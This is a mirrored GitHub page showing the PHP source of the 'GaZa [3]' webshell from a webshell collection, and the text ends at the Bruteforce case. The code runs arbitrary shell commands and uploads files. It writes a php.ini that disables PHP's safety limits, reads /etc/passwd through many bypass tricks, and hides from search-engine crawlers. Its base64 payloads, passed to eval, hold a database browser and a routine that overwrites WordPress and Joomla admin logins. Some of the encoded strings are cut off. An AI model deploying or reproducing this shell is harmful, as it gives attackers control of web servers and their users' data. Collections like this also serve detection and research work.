mirror of
https://github.com/BlackArch/webshells
synced 2024-11-26 05:40:23 +00:00
1593 lines
164 KiB
PHP
1593 lines
164 KiB
PHP
|
<?
|
||
|
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
|
||
|
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
|
||
|
if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
|
||
|
header('HTTP/1.0 404 Not Found');
|
||
|
exit;
|
||
|
}
|
||
|
}
|
||
|
error_reporting(0);
|
||
|
$function_tkl = $_POST['function_tkl'];
|
||
|
$pwd = $_POST['pwd'];
|
||
|
$dir = $_POST['dir'];
|
||
|
if ($dir == ''){
|
||
|
$dir = getcwd();
|
||
|
}
|
||
|
if ($gaza == 'ini'){
|
||
|
$fp = fopen("php.ini","w+");
|
||
|
fwrite($fp,"safe_mode = Off
|
||
|
disable_functions = NONE
|
||
|
open_basedir = OFF ");
|
||
|
}
|
||
|
if (!empty ($_FILES['gazaUP']))
|
||
|
{
|
||
|
move_uploaded_file($_FILES['gazaUP']['tmp_name'],$dir.'/'.$_FILES['gazaUP']['name']);
|
||
|
$gaza_text = "<b>Uploaded Successfully</b><br>file name : ".$_FILES['gazaUP']['name']."<br>file size : ".$_FILES['gazaUP']['size']."<br>file type : ".$_FILES['gazaUP']['type']."<br>";
|
||
|
}
|
||
|
if ($function_tkl == 'mysql'){
|
||
|
$gaza_text1 = "<form method='POST' align='center'>
|
||
|
<br>
|
||
|
:::Please enter your Database information:::
|
||
|
<br>Host Name:<input type='text' name='host_name' value='localhost' ><br>
|
||
|
User Name :<input type='text' name='user_name' ><br>
|
||
|
User Pass :<input type='text' name='user_pass' ><br>
|
||
|
Database Name :<input type='text' name='db_name' ><br>
|
||
|
File to Read :<input type='text' name='gaza_mysql_file' value='/etc/passwd'><br>
|
||
|
<input type='hidden' name='function_tkl' value='mysql1' ><br>
|
||
|
<input type='submit' value='Read' ><br>
|
||
|
</form>
|
||
|
";
|
||
|
}
|
||
|
if ($function_tkl == 'mysql1'){
|
||
|
|
||
|
$host_name = $_POST['host_name']; // e.g : localhost
|
||
|
$user_name = $_POST['user_name']; // e.g : gaza_hacker
|
||
|
$user_pass = $_POST['user_pass']; // e.g : 123456
|
||
|
$db_name = $_POST['db_name']; // e.g : tkl_3654654
|
||
|
$gaza_mysql_file = $_POST['gaza_mysql_file']; // e.g : /etc/passwd
|
||
|
$mysql_use = "yes";
|
||
|
$inquiry = array (
|
||
|
"USE $db_name",
|
||
|
'CREATE TEMPORARY TABLE ' . ($tkl_table = 'A'.time ()) . ' (a LONGBLOB)',
|
||
|
"LOAD DATA LOCAL INFILE '$gaza_mysql_file' INTO TABLE $tkl_table FIELDS "
|
||
|
. "TERMINATED BY '__THIS_NEVER_HAPPENS__' "
|
||
|
. "ESCAPED BY '' "
|
||
|
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
|
||
|
|
||
|
"SELECT a FROM $tkl_table LIMIT 1"
|
||
|
);
|
||
|
mysql_connect ($host_name, $user_name, $user_pass);
|
||
|
|
||
|
foreach ($inquiry as $inquiry_info) {
|
||
|
$quiry = mysql_query ($inquiry_info);
|
||
|
if ($quiry == false) die (
|
||
|
"error: " . $inquiry_info . "\n" .
|
||
|
"error info: " . mysql_error () . "\n"
|
||
|
);
|
||
|
if (! $tkl_read = @mysql_fetch_array ($quiry, MYSQL_NUM)) continue;
|
||
|
$gaza_file = htmlspecialchars($tkl_read[0]);
|
||
|
mysql_free_result ($quiry);
|
||
|
}
|
||
|
}
|
||
|
function readFileTKL ($function_tkl,$pwd) {
|
||
|
|
||
|
switch($function_tkl){
|
||
|
case "show_source":
|
||
|
htmlspecialchars(show_source($pwd));
|
||
|
break;
|
||
|
case "readfile":
|
||
|
htmlspecialchars(readfile($pwd));
|
||
|
break;
|
||
|
case "include":
|
||
|
htmlspecialchars(include $pwd);
|
||
|
break;
|
||
|
case "fpassthru":
|
||
|
$fp = fopen($pwd, 'r');
|
||
|
htmlspecialchars(fpassthru($fp));
|
||
|
break;
|
||
|
case "file":
|
||
|
$output = file($pwd);
|
||
|
foreach( $output as $line )
|
||
|
{
|
||
|
echo htmlspecialchars($line . "\n");
|
||
|
}
|
||
|
break;
|
||
|
case "highlight_file":
|
||
|
htmlspecialchars(highlight_file($pwd));
|
||
|
break;
|
||
|
case "curl":
|
||
|
$tkl_cu =
|
||
|
curl_init("file:///".$pwd."\x00/../../../../../../../../../../../../".__FILE__);
|
||
|
curl_exec($tkl_cu);
|
||
|
htmlspecialchars(var_dump(curl_exec($tkl_cu)));
|
||
|
break;
|
||
|
case "posix_getpwuid":
|
||
|
for($uid=0;$uid<2000;$uid++){
|
||
|
$gaza_ar = posix_getpwuid($uid);
|
||
|
if (!empty($gaza_ar)) {
|
||
|
while (list ($key, $val) = each($gaza_ar)){
|
||
|
print "$val:";
|
||
|
}
|
||
|
print "\n";
|
||
|
}
|
||
|
}
|
||
|
break;
|
||
|
case "copy":
|
||
|
$tmp=tempnam($ooopo, "cx");
|
||
|
if(copy("compress.zlib://".$pwd, $tmp)){
|
||
|
$ioio = fopen($tmp, "r");
|
||
|
echo fread($ioio, filesize($tmp));
|
||
|
fclose($ioio);
|
||
|
unlink($tmp);
|
||
|
};
|
||
|
break;
|
||
|
case "fgets":
|
||
|
$handle = @fopen($pwd, "r");
|
||
|
if ($handle) {
|
||
|
while (($buffer = fgets($handle, 4096)) !== false) {
|
||
|
echo $gaza_file.$buffer;
|
||
|
}
|
||
|
fclose($handle);
|
||
|
}
|
||
|
break;
|
||
|
case "file_get_contents":
|
||
|
echo file_get_contents($pwd);
|
||
|
|
||
|
break;
|
||
|
case "fread":
|
||
|
$handle = fopen($pwd, "r");
|
||
|
echo fread($handle, filesize($pwd));
|
||
|
fclose($handle);
|
||
|
break;
|
||
|
case "stream_get_contents":
|
||
|
if ($stream = fopen($pwd, 'r')) {
|
||
|
echo stream_get_contents($stream, -1, 10);
|
||
|
fclose($stream);
|
||
|
}
|
||
|
break;
|
||
|
}
|
||
|
}
|
||
|
function exTKL() {
|
||
|
$in=$_POST['command'];
|
||
|
if (!$in == '') {
|
||
|
$out = '';
|
||
|
if (function_exists('exec')) {
|
||
|
@exec($in,$out);
|
||
|
$out = @join("\n",$out);
|
||
|
} elseif (function_exists('passthru')) {
|
||
|
ob_start();
|
||
|
@passthru($in);
|
||
|
$out = ob_get_clean();
|
||
|
} elseif (function_exists('system')) {
|
||
|
ob_start();
|
||
|
@system($in);
|
||
|
$out = ob_get_clean();
|
||
|
} elseif (function_exists('shell_exec')) {
|
||
|
$out = shell_exec($in);
|
||
|
} elseif (is_resource($f = @popen($in,"r"))) {
|
||
|
$out = "";
|
||
|
while(!@feof($f))
|
||
|
$out .= fread($f,1024);
|
||
|
pclose($f);
|
||
|
}
|
||
|
echo $out;
|
||
|
}
|
||
|
}
|
||
|
function hidTKL () {
|
||
|
echo "
|
||
|
<html>
|
||
|
<head>
|
||
|
<title>GaZa [3] ~!!</title>
|
||
|
<meta http-equiv='Content-Type' content='text/html; charset=windows-1256' />
|
||
|
<style>
|
||
|
body { background-color:#000000; color:#25ff00; font-family:Verdana; font-size:11px; }
|
||
|
h1,h3 { color:white; font-family:Verdana; font-size:11px; }
|
||
|
input,textarea,select,button { color: rgb(0, 190, 0); background-color:#444; border:1px solid #4F4F4F; font-family:Verdana; font-size:11px; }
|
||
|
textarea { font-family:Courier; }
|
||
|
a { color:rgb(0, 190, 0); text-decoration:none; font-family:Verdana; font-size:11px; }
|
||
|
a:hover { color:rgb(0, 250, 0); }
|
||
|
td { font-size:12px; vertical-align:middle; }
|
||
|
th { font-size:13px; vertical-align:middle; }
|
||
|
table { empty-cells:show; }
|
||
|
.inf { color:#7F7F7F; }
|
||
|
</style>
|
||
|
<!--
|
||
|
###################################################################
|
||
|
# :'######::::::'###::::'########::::'###:::: #
|
||
|
# '##... ##::::'## ##:::..... ##::::'## ##::: #
|
||
|
# ##:::..::::'##:. ##:::::: ##::::'##:. ##:: #
|
||
|
# ##::'####:'##:::. ##:::: ##::::'##:::. ##: #
|
||
|
# ##::: ##:: #########::: ##::::: #########: #
|
||
|
# ##::: ##:: ##.... ##:: ##:::::: ##.... ##: #
|
||
|
# . ######::: ##:::: ##: ########: ##:::: ##: #
|
||
|
# :......::::..:::::..::........::..:::::..:: #
|
||
|
# '##::::'##::::'###:::::'######::'##:::'##:'########:'########::#
|
||
|
# ##:::: ##:::'## ##:::'##... ##: ##::'##:: ##.....:: ##.... ##:#
|
||
|
# ##:::: ##::'##:. ##:: ##:::..:: ##:'##::: ##::::::: ##:::: ##:#
|
||
|
# #########:'##:::. ##: ##::::::: #####:::: ######::: ########::#
|
||
|
# ##.... ##: #########: ##::::::: ##. ##::: ##...:::: ##.. ##:::#
|
||
|
# ##:::: ##: ##.... ##: ##::: ##: ##:. ##:: ##::::::: ##::. ##::#
|
||
|
# ##:::: ##: ##:::: ##:. ######:: ##::. ##: ########: ##:::. ##:#
|
||
|
# ..:::::..::..:::::..:::......:::..::::..::........::..:::::..::#
|
||
|
# '########:'########::::'###::::'##::::'##: #
|
||
|
# ... ##..:: ##.....::::'## ##::: ###::'###: #
|
||
|
# ::: ##:::: ##::::::::'##:. ##:: ####'####: #
|
||
|
# ::: ##:::: ######:::'##:::. ##: ## ### ##: #
|
||
|
# ::: ##:::: ##...:::: #########: ##. #: ##: #
|
||
|
# ::: ##:::: ##::::::: ##.... ##: ##:.:: ##: #
|
||
|
# ::: ##:::: ########: ##:::: ##: ##:::: ##: #
|
||
|
# :::..:::::........::..:::::..::..:::::..:: #
|
||
|
# WwW.Gaza-Hacker.NeT #
|
||
|
# GaZa [3] #
|
||
|
# Coded By TKL #
|
||
|
###################################################################
|
||
|
-->
|
||
|
|
||
|
</head>
|
||
|
<body>
|
||
|
<hr>
|
||
|
<form method='GET'>
|
||
|
<input type='submit' value='Home' size='10' >
|
||
|
<input type='submit' name='tool' value='Files' size='10' >
|
||
|
<input type='submit' name='tool' value='Bruteforce' size='10' >
|
||
|
<input type='submit' name='tool' value='bypass' size='10' >
|
||
|
<input type='submit' name='tool' value='SQL' size='10' >
|
||
|
<input type='submit' name='tool' value='symlink' size='10' >
|
||
|
<input type='submit' name='tool' value='Change-Admin' size='10' >
|
||
|
<input type='submit' name='tool' value='vBulletin-Tool' size='10' >
|
||
|
<input type='submit' name='tool' value='Server-Info' size='10' >
|
||
|
<input type='submit' name='tool' value='About' size='10' >
|
||
|
</form>
|
||
|
<hr>";
|
||
|
}
|
||
|
function fotTKL($gaza_text,$gaza_text1,$dir) {
|
||
|
echo "</textarea>
|
||
|
</td>
|
||
|
</tr>
|
||
|
<tr>
|
||
|
<td>
|
||
|
<left>
|
||
|
<form method='POST'>
|
||
|
<input type='text' name='dir' value= '".$dir."' size='30' >
|
||
|
<input type='submit' value='>>' size='10' >
|
||
|
</form>
|
||
|
</left>
|
||
|
</td>
|
||
|
<form method='POST'> <p>
|
||
|
<input type='text' name='command' />
|
||
|
<input type='submit' value='Execute' />
|
||
|
|
||
|
</p>
|
||
|
</form>
|
||
|
|
||
|
<td align='right' >
|
||
|
<form method='POST'> <p>
|
||
|
<input type='text' name='pwd' value='/etc/passwd' />
|
||
|
<select name='function_tkl'>
|
||
|
<option value='curl'>curl</option>
|
||
|
<option value='show_source'>show source</option>
|
||
|
<option value='stream_get_contents'>stream get contents</option>
|
||
|
<option value='readfile'>readfile</option>
|
||
|
<option value='include'>include</option>
|
||
|
<option value='fpassthru'>fpassthru</option>
|
||
|
<option value='fread'>fread</option>
|
||
|
<option value='file_get_contents'>file get contents</option>
|
||
|
<option value='file'>file</option>
|
||
|
<option value='fgets'>fgets</option>
|
||
|
<option value='copy'>copy</option>
|
||
|
<option value='highlight_file'>highlight file</option>
|
||
|
<option value='posix_getpwuid'>posix_getpwuid</option>
|
||
|
<option value='mysql'>MYsql</option>
|
||
|
</select>
|
||
|
<input type='submit' value='Read' />
|
||
|
</p>
|
||
|
</form>
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
<hr>
|
||
|
<left>
|
||
|
<form method='POST' enctype='multipart/form-data'>
|
||
|
<input type='file' name='gazaUP' size='23' >
|
||
|
<input type='text' name='dir' value='".$dir."' >
|
||
|
<input type='submit' value='Upload' size='35' >
|
||
|
</form>
|
||
|
</left>
|
||
|
<table width='100%'>
|
||
|
<tr>
|
||
|
<td width='50%'>
|
||
|
".$gaza_text."
|
||
|
</td>
|
||
|
<td width='50%' >
|
||
|
".$gaza_text1."
|
||
|
</td>
|
||
|
</tr>
|
||
|
</table>
|
||
|
</body>
|
||
|
</html>";
|
||
|
}
|
||
|
function toolTKL () {
|
||
|
$tkl_tool = $_GET['tool'];
|
||
|
switch($tkl_tool){
|
||
|
case "About":
|
||
|
$tkl = "ZWNobyAiR2FaYSBTaGVsbCBWIDMgPGJyIC8+PGEgaHJlZj0naHR0cDovL2dhemEtaGFja2VyLm5ldCcgdGFyZ2V0PSdfYmxhbmsnPkdhemEgSGFDS2VSIFRlYW08L2E+PGJyIC8+IERldmVsb3BlZCBieSA8YSBocmVmPSdodHRwOi8vd3d3LmZhY2Vib29rLmNvbS9kci50a2wnIHRhcmdldD0nX2JsYW5rJz5US0w8L2E+IjsK";
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "SQL":
|
||
|
$tkl = "ZWNobyAiPHNjcmlwdD4gICAgIHZhciBwMV8gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AxJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AxJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBwMl8gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AyJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AyJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBwM18gPSAnIiAuICgoc3RycG9zKEAkX1BPU1RbJ3AzJ10sIlxuIikhPT1mYWxzZSk/Jyc6aHRtbHNwZWNpYWxjaGFycygkX1BPU1RbJ3AzJ10sRU5UX1FVT1RFUykpIC4iJzsgICAgIHZhciBkID0gZG9jdW1lbnQ7IAlmdW5jdGlvbiBzZXQoYSxjLHAxLHAyLHAzLGNoYXJzZXQpIHsgCQlpZihhIT1udWxsKWQubWYuYS52YWx1ZT1hO2Vsc2UgZC5tZi5hLnZhbHVlPWFfOyAJCWlmKGMhPW51bGwpZC5tZi5jLnZhbHVlPWM7ZWxzZSBkLm1mLmMudmFsdWU9Y187IAkJaWYocDEhPW51bGwpZC5tZi5wMS52YWx1ZT1wMTtlbHNlIGQubWYucDEudmFsdWU9cDFfOyAJCWlmKHAyIT1udWxsKWQubWYucDIudmFsdWU9cDI7ZWxzZSBkLm1mLnAyLnZhbHVlPXAyXzsgCQlpZihwMyE9bnVsbClkLm1mLnAzLnZhbHVlPXAzO2Vsc2UgZC5tZi5wMy52YWx1ZT1wM187IAkJaWYoY2hhcnNldCE9bnVsbClkLm1mLmNoYXJzZXQudmFsdWU9Y2hhcnNldDtlbHNlIGQubWYuY2hhcnNldC52YWx1ZT1jaGFyc2V0XzsgCX0gCWZ1bmN0aW9uIGcoYSxjLHAxLHAyLHAzLGNoYXJzZXQpIHsgCQlzZXQoYSxjLHAxLHAyLHAzLGNoYXJzZXQpOyAJCWQubWYuc3VibWl0KCk7IAl9ICA8L3NjcmlwdD4iOyAJY2xhc3MgRGJDbGFzcyB7IAkJdmFyICR0eXBlOyAJCXZhciAkbGluazsgCQl2YXIgJHJlczsgCQlmdW5jdGlvbiBEYkNsYXNzKCR0eXBlKQl7IAkJCSR0aGlzLT50eXBlID0gJHR5cGU7IAkJfSAJCWZ1bmN0aW9uIGNvbm5lY3QoJGhvc3QsICR1c2VyLCAkcGFzcywgJGRibmFtZSl7IAkJCXN3aXRjaCgkdGhpcy0+dHlwZSkJeyAJCQkJY2FzZSAnbXlzcWwnOiAJCQkJCWlmKCAkdGhpcy0+bGluayA9IEBteXNxbF9jb25uZWN0KCRob3N0LCR1c2VyLCRwYXNzLHRydWUpICkgcmV0dXJuIHRydWU7IAkJCQkJYnJlYWs7IAkJCQljYXNlICdwZ3NxbCc6IAkJCQkJJGhvc3QgPSBleHBsb2RlKCc6JywgJGhvc3QpOyAJCQkJCWlmKCEkaG9zdFsxXSkgJGhvc3RbMV09NTQzMjsgCQkJCQlpZiggJHRoaXMtPmxpbmsgPSBAcGdfY29ubmVjdCgiaG9zdD17JGhvc3RbMF19IHBvcnQ9eyRob3N0WzFdfSB1c2VyPSR1c2VyIHBhc3N3b3JkPSRwYXNzIGRibmFtZT0kZGJuYW1lIikgKSByZXR1cm4gdHJ1ZTsgCQkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIHNlbGVjdGRiKCRkYikgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlpZiAoQG15c3FsX3NlbGVjdF9kYigkZGIpKXJldHVybiB0cnVlOyAJCQkJCWJyZWFrOyAJCQl9IAkJCXJldHVybiBmYWxzZTsgCQl9IAkJZnVuY3Rpb24gcXVlcnkoJHN0cikgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpIHsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9IEBteXNxbF9xdWVyeSgkc3RyKTsgCQkJCQlicmVhazsgCQkJCWNhc2UgJ3Bnc3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9IEBwZ19xdWVyeSgkdGhpcy0+bGluaywkc3RyKTsgCQkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIGZldGNoKCkgeyAJCQkkcmVzID0gZnVuY19udW1fYXJncygpP2Z1bmNfZ2V0X2FyZygwKTokdGhpcy0+cmVzOyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gQG15c3FsX2ZldGNoX2Fzc29jKCRyZXMpOyAJCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiBAcGdfZmV0Y2hfYXNzb2MoJHJlcyk7IAkJCQkJYnJlYWs7IAkJCX0gCQkJcmV0dXJuIGZhbHNlOyAJCX0gCQlmdW5jdGlvbiBsaXN0RGJzKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogICAgICAgICAgICAgICAgICAgICAgICAgcmV0dXJuICR0aGlzLT5xdWVyeSgiU0hPVyBkYXRhYmFzZXMiKTsgCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiAkdGhpcy0+cmVzID0gJHRoaXMtPnF1ZXJ5KCJTRUxFQ1QgZGF0bmFtZSBGUk9NIHBnX2RhdGFiYXNlIFdIRVJFIGRhdGlzdGVtcGxhdGUhPSd0JyIpOyAJCQkJYnJlYWs7IAkJCX0gCQkJcmV0dXJuIGZhbHNlOyAJCX0gCQlmdW5jdGlvbiBsaXN0VGFibGVzKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gJHRoaXMtPnJlcyA9ICR0aGlzLT5xdWVyeSgnU0hPVyBUQUJMRVMnKTsgCQkJCWJyZWFrOyAJCQkJY2FzZSAncGdzcWwnOiAJCQkJCXJldHVybiAkdGhpcy0+cmVzID0gJHRoaXMtPnF1ZXJ5KCJzZWxlY3QgdGFibGVfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hICE9ICdpbmZvcm1hdGlvbl9zY2hlbWEnIEFORCB0YWJsZV9zY2hlbWEgIT0gJ3BnX2NhdGFsb2cnIik7IAkJCQlicmVhazsgCQkJfSAJCQlyZXR1cm4gZmFsc2U7IAkJfSAJCWZ1bmN0aW9uIGVycm9yKCkgeyAJCQlzd2l0Y2goJHRoaXMtPnR5cGUpCXsgCQkJCWNhc2UgJ215c3FsJzogCQkJCQlyZXR1cm4gQG15c3FsX2Vycm9yKCk7IAkJCQlicmVhazsgCQkJCWNhc2UgJ3Bnc3FsJzogCQkJCQlyZXR1cm4gQHBnX2xhc3RfZXJyb3IoKTsgCQkJCWJyZWFrOyAJCQl9IAkJCXJldHVybiBmYWxzZTsgCQl9IAkJZnVuY3Rpb24gc2V0Q2hhcnNldCgkc3RyKSB7IAkJCXN3aXRjaCgkdGhpcy0+dHlwZSkJeyAJCQkJY2FzZSAnbXlzcWwnOiAJCQkJCWlmKGZ1bmN0aW9uX2V4aXN0cygnbXlzcWxfc2V0X2NoYXJzZXQnKSkgCQkJCQkJcmV0dXJuIEBteXNxbF9zZXRfY2hhcnNldCgkc3RyLCAkdGhpcy0+bGluayk7IAkJCQkJZWxzZSAJCQkJCQkkdGhpcy0
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "Change-Admin":
|
||
|
$tkl = "ZWNobyAnPGZvcm0gbWV0aG9kPSJQT1NUIj5TZWxlY3QgU2NyaXB0IFR5cGUgOiA8YnI+PHA+IAkJCTxzZWxlY3QgbmFtZT0iQ2hhbmdlLUFkbWluX3R5cGUiPiAJCQkJPG9wdGlvbiB2YWx1ZT0id3AiPldvcmRQcmVzczwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0iam9vbSI+Sm9vbWxhPC9vcHRpb24+IAkJCQk8b3B0aW9uIHZhbHVlPSJhcmFiIj5hcmFiIHBvcnRhbDwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0idmIiPnZCdWxsZXRpbjwvb3B0aW9uPiAJCQkJPG9wdGlvbiB2YWx1ZT0icGhwYmIiPnBocEJCPC9vcHRpb24+IAkJCQk8b3B0aW9uIHZhbHVlPSJ3aG1jcyI+d2htY3M8L29wdGlvbj4gCQkJCTxvcHRpb24gdmFsdWU9InplbmNhcnQiPlplbiBDYXJ0PC9vcHRpb24+IAkJCQkJCQkJPC9zZWxlY3Q+IAkJCTxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSI+PiIgLz4gCQkgCQkJPC9wPiAJCTwvZm9ybT4nOyAgIGlmICgkX1BPU1RbJ0NoYW5nZS1BZG1pbl90eXBlJ10gPT0gJ3dwJyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+VGFibGUgUHJlZml4IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IndwXyIgbmFtZT0icHJlZml4IiB0eXBlPSJ0ZXh0Ij48YnI+IDxicj51c2VybmFtZSA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InVzZXJuYW1lIiB0eXBlPSJ0ZXh0Ij4gPGJyPnBhc3N3b3JkIDogPGJyPjxJTlBVVCBzaXplPSIxNSIgdmFsdWU9IiIgbmFtZT0icGFzc3dvcmQiIHR5cGU9InBhc3N3b3JkIj48YnI+ICAgPGJyPjo6OldvcmRwcmVzcyBBZG1pbiBpbmZvOjo6IDxicj5OZXcgdXNlcm5hbWU6PGJyPiA8SU5QVVQgbmFtZT0iYWRtaW4iIHNpemU9IjE1IiB2YWx1ZT0iYWRtaW4iPjxicj4gTmV3IHBhc3N3b3JkOjxicj4gPElOUFVUIG5hbWU9InB3ZCIgc2l6ZT0iMTUiIHZhbHVlPSIxMjMxMjMiPjxicj4gTmV3IEVtYWlsOjxicj4gPElOUFVUIG5hbWU9ImVtYWlsIiBzaXplPSIxNSIgdmFsdWU9ImVtYWlsQHNpdGUuY29tIj48YnI+IDxJTlBVVCB2YWx1ZT0iY2hhbmdlIiBuYW1lPSJzZW5kIiB0eXBlPSJzdWJtaXQiPiA8L0ZPUk0+JzsgfSBpZiAoJF9QT1NUWydzZW5kJ10gPT0gJ2NoYW5nZScpeyAkbG9jYWxob3N0ID0gJF9QT1NUWydsb2NhbGhvc3QnXTsgJGRhdGFiYXNlICA9ICRfUE9TVFsnZGF0YWJhc2UnXTsgJHVzZXJuYW1lICA9ICRfUE9TVFsndXNlcm5hbWUnXTsgJHBhc3N3b3JkICA9ICRfUE9TVFsncGFzc3dvcmQnXTsgJHB3ZCAgID0gJF9QT1NUWydwd2QnXTsgJGFkbWluID0gJF9QT1NUWydhZG1pbiddOyAkU1FMID0gJF9QT1NUWydlbWFpbCddOyAkcHJlZml4ID0gJF9QT1NUWydwcmVmaXgnXTsgICBAbXlzcWxfY29ubmVjdCgkbG9jYWxob3N0LCR1c2VybmFtZSwkcGFzc3dvcmQpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgIEBteXNxbF9zZWxlY3RfZGIoJGRhdGFiYXNlKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICAkaGFzaCA9IGNyeXB0KCRwd2QpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfbG9naW4gPSciLiRhZG1pbi4iJyBXSEVSRSBJRCA9IDEiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcl9wYXNzID0nIi4kaGFzaC4iJyBXSEVSRSBJRCA9IDEiKSBvciBkaWUobXlzcWxfZXJyb3IoKSk7ICR0a2w9QG15c3FsX3F1ZXJ5KCJVUERBVEUgIi4kcHJlZml4LiJ1c2VycyBTRVQgdXNlcl9sb2dpbiA9JyIuJGFkbWluLiInIFdIRVJFIElEID0gMiIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VyX3Bhc3MgPSciLiRoYXNoLiInIFdIRVJFIElEID0gMiIpIG9yIGRpZShteXNxbF9lcnJvcigpKTsgJHRrbD1AbXlzcWxfcXVlcnkoIlVQREFURSAiLiRwcmVmaXguInVzZXJzIFNFVCB1c2VyX2xvZ2luID0nIi4kYWRtaW4uIicgV0hFUkUgSUQgPSAzIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfcGFzcyA9JyIuJGhhc2guIicgV0hFUkUgSUQgPSAzIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAkdGtsPUBteXNxbF9xdWVyeSgiVVBEQVRFICIuJHByZWZpeC4idXNlcnMgU0VUIHVzZXJfZW1haWwgPSciLiRTUUwuIicgV0hFUkUgSUQgPSAxIikgb3IgZGllKG15c3FsX2Vycm9yKCkpOyAgIGlmKCR0a2wpeyBlY2hvICI8Yj4gU3VjY2VzczwvYj4gIjsgfSAgfSBpZiAoJF9QT1NUWydDaGFuZ2UtQWRtaW5fdHlwZSddID09ICdqb29tJyl7IGVjaG8gJzxGT1JNIG1ldGhvZD0iUE9TVCI+IDo6OkRhdGFCYXNlIGluZm86Ojo8YnI+IGhvc3QgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0ibG9jYWxob3N0IiBuYW1lPSJsb2NhbGhvc3QiIHR5cGU9InRleHQiPiA8YnI+ZGF0YWJhc2UgOjxicj4gPElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJkYXRhYmFzZSIgdHlwZT0idGV4dCI+PGJyPiA8YnI+VGFibGUgUHJlZml4IDo8YnI+IDxJTlBVVCBzaXplPSIxNSIgdmFsdWU9Impvc18iIG5hbWU9InByZWZpeCIgdHlwZT0idGV4dCI+PGJyPiA8YnI+dXNlcm5hbWUgOiA8YnI+PElOUFVUIHNpemU9IjE1IiB2YWx1ZT0iIiBuYW1lPSJ1c2VybmFtZSIgdHlwZT0idGV4dCI+IDxicj5wYXNzd29yZCA6IDxicj48SU5QVVQgc2l6ZT0iMTUiIHZhbHVlPSIiIG5hbWU9InBhc3N3b3JkIiB0eXBlPSJwYXNzd29yZCI+PGJyPiAgIDxicj46OjpKb29tbGEgQWRtaW4gaW5mbzo6OiA8YnI+TmV3IHVzZXJuYW1lOjxicj4gPElOUFVUIG5hbWU9ImFkbWluIiBzaXplPSIxNSIgdmFsdWU9ImFkbWluIj4
|
||
|
eval(base64_decode($tkl));
|
||
|
exit;
|
||
|
case "Bruteforce":
|
||
|
